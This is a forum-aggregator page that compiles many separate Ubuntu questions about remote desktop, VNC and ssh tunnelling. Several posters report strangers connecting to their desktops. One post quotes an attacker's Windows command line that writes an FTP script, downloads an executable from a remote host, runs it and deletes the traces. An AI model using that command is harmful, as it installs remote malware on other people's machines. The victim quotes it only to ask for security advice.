Ubuntu Security :: Random Outside IP Trying To Access Remote Desktop
Jun 5, 2011
I was sitting watching a TV show on the internet (streaming from Channel 4) and all of a sudden I get a request from an unknown IP address, outside of my local network, attempting to access my Ubuntu desktop. I obviously declined straight away and stupidly didn't take note of the IP. I've checked my firewall settings and no ports are being forwarded; everything is as it should be. I am running Ubuntu 11.04, and a little bit concerned. As of now I have completely disabled remote desktop on my laptop.
I was running Ubuntu 10.04 on a school laptop connected to the network. I was editing a file in emacs on an ssh connection to a school server when all of a sudden I see the remote desktop graphic (a thing that looks like a widescreen monitor) pop up in the top panel. A second later it announces that someone else has connected to my computer with 'ffff:someip'. I'm not sure of the specifics because I was too shocked. I do remember it started with some number of f's before a ':'. The hacker then started typing
Code:
%systemroot%system32cmd.exe del eq&e
I promptly yanked out the ethernet cable before anything else could be typed. I then went in and changed the Remote Desktop preferences to not allow anyone in. I'm guessing that I cut the hacker off from fully entering in a command similar to this:
Code:
%systemroot%system32cmd.exe del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq
which I found here: [URL]
How concerned should I be? It appears to be a Windows hack. Did I prevent any damage from occurring? Is Remote Desktop really that easy to connect to another person's computer? I know this question is bait in a way. On my home machines I only allow VNC via ssh tunnels and that is through a router with proper port forwarding for the ssh ports and very few other ports forwarded. Such an attack has never happened to me at home. Is this possibly due to my setup or was I just lucky no one picked my computer to hack? So is the ssh tunnel & port forwarding a sufficiently safe setup or am I still at risk?
What degree of protection does the ssh tunnel and port forwarding provide? What else should I do to make my current home setup even more secure? The text I wrote above was the only text typed into the terminal. Because the attack was over Remote Desktop, what is the possibility that it was a bot? The text appeared slow enough for me to think that there was a person rather than a machine/program typing in the text. Does the Remote Desktop connection in a way provide a level of abstraction that prevents scripts, as commands must be typed in through the Remote Desktop connection (vs. an ssh connection where a script might more easily be uploaded and executed)?
In the end I'm curious as to what else might have been accessed over the connection or if it was probably just restricted to the hacker attempting to run some Windows commands? Since they connected via Remote Desktop and I saw the connection pop up and the typing begin in my terminal, did I see everything that the hacker attempted to perform? Am I correct in my research in finding that there is no log for Remote Desktop connections and therefore I can't find the IP they were connecting from? However, I would like to use this as a wake-up call to myself to prevent unwanted access on my home computers.
Running Ubuntu 9.10. In the Remote Desktop config dialog I get: "Your desktop is only reachable over the local network. Others can access your computer using the address 127.0.0.1 or tabatha.local." I understand this means only the loopback ip address is available. All my other machines show their true local ip address (e.g., 192.168.1.104) in this dialog. Thus I cannot log on to this desktop from other machines.
When I try to do a remote logon from another Ubuntu 9.10 box (or from an XP box using a VNC viewer), I get: "Connection to 192.168.1.102 has been closed." What steps are needed to make this machine show its actual IP address? All file sharing between the various machines is working properly and all Windows shares back and forth between XP and 'nix, and among the various XP boxes and Linux boxes, are available as designed.
I always use VNC to check my server for updates, and this morning I started the xvnc4viewer to VNC into my server and it kept asking for a password. I never set up a password because I do this locally from my laptop, and I am the only one who uses my laptop. I had to go to my server and check the settings in System > Preferences > Remote Desktop and found them all changed. There was a password set up and there was a check mark in "You must confirm each access to this machine". Was there some security update that changed all these settings? Sometimes when I do updates I don't know what is being changed on my server.
So I've read a bit and it seems that this is okay and secure. But I wanted to double check here with everyone, because I trust here more than just about anywhere. I've read about the hipporemote (which is pretty cool) and I have it working. Basically I want to make sure my system is still secure.
1. I had to open a port on my firewall for the VNC connection.
2. I turned on the Remote Desktop
2a. Checked Allow other users to view....
2b. Checked Allow other users to control....
2c. Checked You must confirm.....
2d. Checked for password, and put in a password
2e. Checked Configure network automatically to accept connections
So with doing all of that, am I ok? I think so, especially since it says it's only accessible on my local network. But I just wanted to hear from people who know more than I do that I don't need to worry any more than normal about others accessing my machine. I'm mainly thinking 2e, I don't fully understand what's going on there.
How can I remotely access my PC at home from work, on a different PC that has access to the Internet? What software shall I install on my PC at home? I want to be able to install software on my PC at home from my workplace. My home PC has Ubuntu: Linux ubuntu 2.6.31-17-generic #54-Ubuntu SMP Thu Dec 10 17:01:44 UTC 2009 x86_64 GNU/Linux
Today I noticed my Desktop was being controlled remotely from over the Internet even though I had it set for 'local network only'. Foolishly I relied on this setting and hadn't specified a password or other security. The remote user had opened my Firefox passwords page and was perusing this when I pulled the plug.
All external checks confirmed that my router/firewall is actively blocking correctly. How could this happen? How can I prevent this in the future? I had recently installed the Firefox extension for Weave Sync and wonder if that had anything to do with it?
I just had a window pop up on my desktop saying my PC was being remotely controlled. Ubuntu 10.10. The PC shut down by itself, and I disconnected it from the net. I rebooted and uninstalled the remote desktop app.
I just set up Remmina the other day to be able to access my desktop remotely. However, I can only do this when I am connected to my home network. Is there a way to set up Remmina so that I can connect to my desktop remotely from outside my home network?
My g/f was able to access her job's computers from home in Windows. She'd go Start -> Programs -> Access -> Connect to Remote Desktop... (or something like that). In any event, I've found some programs in Fedora 14 that say they'd do the same, however I can't get it to work. In "Remote Desktop Viewer" I'm trying to use the 'VNC' protocol, and trying to put the IP in the first of the "Host" lines.
Now, there might be another issue: is it possible she needs more info than the ones she got in order to use Linux remote desktop? She has (what she has written down as) Computer # 220.127.116.11 and then ';' and 4 additional numbers, so (for the sake of the example) computer#: 18.104.22.168;2222. She has a 'username' and a 'password'.
I am attempting to set up a VNC with ssh tunneling for remote desktop between my laptop (openSUSE 11.2) and my desktop (Kubuntu Karmic), using the instructions here: [URL] and here: [URL], but I am having trouble getting remote desktop to work once I establish the ssh tunnel.
I start out with
Code:
ssh <user@remotepc> -p <non22port> -L 5900:localhost:5900
That seems to work and connect properly.
The problem comes when I try to use a remote desktop client on the laptop to initiate the VPN desktop sharing and point it to
Code:
localhost:5900
That's when I get a notification on the host saying:
Code:
Refused uninvited connection attempt from 127.0.0.1
And on the laptop I get:
Code:
VNC server closed connection
I have tried messing with the few settings in Krfb, but none seem to have any impact. How do I open localhost:5900 and allow VPN tunneling to the host machine?
I have been using Remote Desktop on Windows 7 to view and control my Ubuntu machine in the office quite happily over the office network. No problems there. I wanted to access it from my home connection so I read that I could do this by opening a port on the Ubuntu machine's firewall. So I installed a firewall. Didn't see any way to open a port easily so I uninstalled it and installed another one. Same issue so I uninstalled that and then left it. I then tried to Remote Desktop the Ubuntu machine from my Windows 7 laptop and ERROR, I can no longer connect.
I was working on my desktop under Ubuntu 9.10 when I got a message in the upper right telling me that my Remote Desktop Connection had been activated. I don't know who it was, but they proceeded to open up a terminal and start typing a bunch of stuff. This scared the living @#$^ out of me, so I didn't really pay attention to what he was doing and immediately dove for the reset button. I disconnected my network from the web and found that RDC was NOT password protected.
Now, I probably did this a little while ago while I was playing around with it, but I also set up an account with dyndns.org. Would this possibly increase the number of attacks on my network? Just in case, I have removed my listing. Also, would any of this incident be logged somewhere? How/Where would I look to see if I'm being poked and prodded for another security hole?
I set up a remote web server yesterday evening, which had CentOS 5.3 on it. This went well, and I did this mostly over VNC, to get a GUI. However, I hadn't realised that there was a pending cron job to 'yum upgrade'. So, come 2am, 5.3 turned into 5.6. I carried on the install today, but after some time (I'm not sure exactly how or when), I lost the ability to run any GUI system config tools that required root login. I also lost the ability to run anything graphical - emacs, for example, when I was already root in an xterm.
/var/log/secure isn't telling me anything. It claims that it's running the config tool on my behalf, but nothing happens. If I try to run emacs, I get a message saying that the X server isn't responding. Could this be related to the upgrade? It feels like a PolicyKit problem - I've seen something similar on 6.0 for remote access over VNC - but 5.6 isn't running PolicyKit.
I have 4 boxes on a local network: 2 with XP only, 1 with Ubuntu 9.10 only, and 1 with both. All boxes can share folders, set up with share-admin instead of using Nautilus right-click properties for each folder. I can see and control the remote desktops on all boxes, to all other boxes, from all other boxes, with one exception: I can only access the XP desktop on the dual boot box, not the Ubuntu desktop. When I try I get: "Connection to host 192.168.1.102 was closed." I am refused access to the Ubuntu desktop in this manner from both the other Ubuntu machine, and from both XP machines.
My setups are basically plain vanilla with routine installs of Ubuntu 9.10. On the XP machines I am using TightVNC on the XP machines to view both other XP desktops, and the Ubuntu desktop that is accessible. On both Ubuntu setups I am using (I suppose) vino and vinagre, and have completely re-installed what I think is the relevant software. There is no firewall running on the Ubuntu dual boot, when I check ufw. For reasons I cannot determine the inaccessible Ubuntu desktop is not providing its own address but instead in the Remote Desktop config dialogue it identifies itself as 22.214.171.124 which I think is the loopback id. I know so little about this sort of networking that I am not giving all relevant info, but I still thought I'd try.
I have just installed Linux 10.10. I want to use VNC on another computer to access my desktop using remote access. When I navigate to Remote Desktop Preferences: "Your desktop is only reachable over the local network. Others can access your computer using the address localhost", no IP address. This is not working.
I am having the following problems: I have tried installing vnctightserver on Ubuntu and then installing the viewer on my Windows machine but when I try to connect it rejects the connection... I need to remotely access the ubuntu-desktop on my Ubuntu server LTS 10.04... I have tried a number of guides but none are working for me... I have a firewall installed (iptables) but the necessary ports have been opened up but my server still rejects incoming VNC connections. On a side note I do not have physical access to the server so all setup needs to be done via SSH...
What I want to do is pull data from any of the hard drives attached to my Linux box from my Windows machine. I have been moving small amounts of data from the drives to my OS drive and those parts share easily, but I want to move away from that method to move large amounts of data at the same time. I have tried using Samba as it is used for file sharing between systems and that I have to give my Windows box permission through Samba.
Trick is, I'm not sure where to start, though I have an idea and wanted to know if this is the right track before I start editing my file system.
Weird thing going on on my headless lenny box. The shared desktop won't let me in. I am trying to connect with my Mac, ssh is ok. I can connect, start vino-preferences, change everything I want to change, and still it won't let me in. Both Mac Ctrl-k to vnc://lenny and Chicken of the VNC won't connect.
New Fedora 13 install. I have Remote Desktop enabled. I can access the machine from itself but not others on the network. I stopped the firewall, that did not work. I looked in hosts.allow and hosts.deny, no entries there. The vino server is running. There is nothing in /var/log/messages, dmesg or /var/log/secure, at least nothing I could find related to vino. What else can I check? The conf file in my home folder looks exactly like one on another machine where it is working. Forgot to add: the message I get when I try it from a remote machine is "The connection to host 192.168.1.100 was closed". So it appears something is actively rejecting the login.
I use a hosted machine for work which has vnc and apache servers running. To work on a shell, I connect to the VNC server, and to access files I host them using apache and open them from my browser. It would be great if I can access my shells via my browser itself instead of using VNC or command prompt.
I am looking for an end result like this: [URL].. What are my options? PS: I already tried [URL].. but this uses a Java applet to run and does not do it in the browser itself.
They are running Kubuntu. How to access their desktop from my home or office using the Internet? Logically I remembered about krfb and x11vnc. But both of them need some approach to provide security. I'd like it if someone could give me some pieces of advice on choosing the simplest and better approach:
To secure krfb or x11vnc, is it simpler or better to mount a VPN or to use an ssh tunnel? Is there any other solution? My parents' ISP uses DHCP, so I think it would require some service like dyndns or similar...
I've just been tasked with making our company's workstations available from remote locations over our internet connection. While it seems simple in concept, I know there will be several issues I'll have to deal with. What I'd like to know is if anyone has recommendations as far as software to use and methods for securing connections. I'd like to have communications encrypted, which last I heard OpenVNC couldn't do (maybe that's not the case?). Also, I'm not really sure how the interactions between Windows clients vs. my Linux server and the remote connections should be handled. Would I need a separate instance of say, OpenVNC, on each client that I wanted to be allowed remote access?
I have a home LAN server with Ubuntu Desktop edition 10.10 and I'm having a problem with the remote desktop application. For now I have a monitor on that machine, but in the future it's gonna be only the box, without any peripheral devices. When I try to log in via UltraVNC from Windows XP, on the Ubuntu server a little window pops up, asking me to allow or refuse this "invader", so I click Allow and I really have full control on that machine. However, when I don't have any devices I wouldn't be able to click this Allow button, but will have to have full control. So, my question is how to autoclick this Allow button? Or when I try to log in to the Ubuntu machine, it would automatically give me full control?
I'm using a fingerprint reader on my laptop, works pretty well:
Code:
$ sudo echo hi
Please swipe your finger: [swipe finger here of course]
Like I said, it works nicely... until I try to SSH in and sudo something remotely, when it will ask me kindly to swipe my finger over the reader that's attached to the laptop which is on my desk at home thirty kilometres away. Naturally there's no method built into pam_fprint to abort via a keypress.
So, is there any way to tell PAM to only use certain modules if I'm in a locally logged in session?